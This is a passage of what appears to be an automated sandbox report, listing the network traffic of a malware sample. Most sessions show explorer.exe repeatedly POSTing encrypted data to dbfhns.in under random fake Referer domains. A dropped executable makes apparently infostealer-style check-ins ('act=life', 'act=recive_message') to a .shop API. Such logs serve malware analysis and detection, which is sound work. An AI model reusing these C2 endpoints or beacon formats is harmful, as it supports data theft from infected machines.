                                                          May 27, 2024 00:29:19.604016066 CEST276OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2e 07 a0 ed
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu.k1nmg48-`5;4l,oK(W@'tFJSR!R^*ifEhN{grC4E>}m}Li^Dz]oqh=8m
                                                          May 27, 2024 00:29:20.635092974 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:20 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.549776186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:29:27.743669987 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://uvpyitsqtsmmqygu.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 248
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:27.743717909 CEST248OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 32 ee e4
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuV2am$d^4{=+n\uPk0Z@]M"KFL{5Gzi*(!@nVd` Dv~h1z#^c(Q5
                                                          May 27, 2024 00:29:28.763854980 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:28 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.549777186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:29:33.855725050 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://yowyackmlvbjrxy.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 162
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:33.856026888 CEST162OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 1b bc b6
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu)J=nuAa;B]$/QNCTWZNn/\<{_
                                                          May 27, 2024 00:29:34.922079086 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:34 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.549778186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:29:39.895797014 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://jkbknieekjatcp.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 187
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:39.895843029 CEST187OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 37 c8 bf
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu77IG[u6OI6rkGT#bNb.*S}X0#bWP2dQ%3
                                                          May 27, 2024 00:29:40.945394993 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:40 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.549779186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:29:47.866786957 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://txclniyqjcys.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 128
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:47.866815090 CEST128OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 3c e1 8a
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuC<\Vw`L1mSDhz(}~!
                                                          May 27, 2024 00:29:48.894093037 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:48 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.549780186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:29:52.939237118 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://kmtbjhmhexqkn.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 279
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:52.939274073 CEST279OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7a 02 ef 89
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuzS@]AtwOn[ss(A;K>TU_Z#BZFV^'ZX~+DZ&xHK]|<qzMC&X|gZ#h9Nu
                                                          May 27, 2024 00:29:53.945550919 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:53 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.549781186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:29:58.334388971 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://jsnmddlhyunj.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 142
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:58.334429026 CEST142OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 52 d9 ae
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu:RSNNoSUCjF"XPL7$Gn8
                                                          May 27, 2024 00:29:59.526978970 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:59 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.549782186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:30:05.849412918 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://eamimphmsadwkq.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 246
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:05.849412918 CEST246OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 56 ac e6
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuxVkdklF^&Ta:?y:uDz#]^r4]2Y|*QZ7M&s!Z)5RH%7zfv/EPk`vFK#"
                                                          May 27, 2024 00:30:06.899574041 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:06 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.549783186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:30:11.305895090 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://anyyjopgfajdv.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 173
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:11.305944920 CEST173OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 33 a7 fc
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu43\Zk_}4c?r;Zv|g&J~-SU1ORI=1tIO;/
                                                          May 27, 2024 00:30:12.513031006 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:12 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.549784186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:30:16.965106964 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://tlfkitushftrjirb.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 211
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:16.965137005 CEST211OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 45 c7 fb
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu|E\~rZ}T8v5uw,0`Gz"%ZJYT>-={^HLG!|mqo%-Br
                                                          May 27, 2024 00:30:17.984780073 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:17 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.549785186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:30:23.451714039 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://plbuqwbmoldqvnm.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 185
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:23.451714993 CEST185OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2c 30 c1 ae
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu,0W,Y`ecgZSbkrh\PSo&)XAb+U^=<fXOwN*
                                                          May 27, 2024 00:30:24.474302053 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:24 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.549786186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:30:28.702004910 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://tjxcjquxocrwkw.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 205
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:28.702028036 CEST205OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 56 fe e6
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu~Vw7wfWU#>3SB_fs{x8Kdg!\U>?Aj[Q@[=7&x1
                                                          May 27, 2024 00:30:29.990979910 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:29 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.549787186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:30:34.843314886 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://wmlhlokjcexweyx.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 248
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:34.843359947 CEST248OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 5a b2 83
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuCZ1Bw:v"a8ZT2{@B&I]h\8tW.Q%gpjP}%K"wqYT29:jIPS3p6{i`[1)-
                                                          May 27, 2024 00:30:35.907485008 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:35 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.549788186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:30:42.022425890 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://vjusdpgryce.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 196
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:42.022459030 CEST196OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 38 d9 e5
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu88}1UtOw}jcO90o*p?i'^OIA2"%uQ.\(08<EU'
                                                          May 27, 2024 00:30:43.034023046 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:42 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.549789186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:30:47.787369013 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ajfprnyfteagngdf.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 317
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:47.787408113 CEST317OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 0e fe b7
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuwygQt'=Hv:3(0)zvHVk[],IXlTSd#kZ6/LoXemZ,P.(o
                                                          May 27, 2024 00:30:48.800028086 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:48 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r
                                                          May 27, 2024 00:30:49.088643074 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:48 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.549790186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:30:56.387180090 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://nqimnaeauxblwda.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 330
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:56.387204885 CEST330OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 5d c5 fa
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu)]rlg, l-`o!S{y# GS;XPs@U6c&i49>/hTv,I*OD1aq([I
                                                          May 27, 2024 00:30:57.441029072 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:57 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549720188.114.97.34435640C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:27:25 UTC271OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2024-05-26 22:27:25 UTC806INHTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:25 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=47nfmbqjldknucg7gvg5bmf2rm; expires=Thu, 19-Sep-2024 16:14:04 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vQPyIPYxHMy3mFUIcHobZVCqxAXfXYXULBa81lKSyHBOCq4QwYdYZJte92BRTTQtk%2BUA3wAFi7IDNLq5LXXwySgHvl4MgbRWSzXA2K4rD5FWG9YZOW6PvT9ai445smNyMnEtkNBMvntxMGM%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a131444e3643fb-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:25 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2024-05-26 22:27:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.549722188.114.97.34435640C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:27:26 UTC272OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 74
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:26 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 73 77 67 35 45 47 2d 2d 26 6a 3d 38 62 61 63 36 34 34 31 36 36 63 64 64 32 32 30 34 64 30 66 61 33 30 36 31 37 32 62 30 32 35 34
                                                          Data Ascii: act=recive_message&ver=4.0&lid=swg5EG--&j=8bac644166cdd2204d0fa306172b0254
                                                          2024-05-26 22:27:26 UTC812INHTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=nkkmom5fgim5a818o2nuh1qrnu; expires=Thu, 19-Sep-2024 16:14:05 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dYZElsZi7cZIaPypMb6MJiO5s2O%2F3%2BGJMBhSNReuEXh4aqfNu3PgJCo8ZOWjYBUKgJY7%2BUIalyookcofw7Lx6j%2FJS23iVycCc0AxfFgl5knzeshSQ9M99TX1hQ1uyxwoBaldB3ixaxaxy3A%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1314a7f500cba-EWR
                                                          alt-svc: h3=":443"; ma=86400
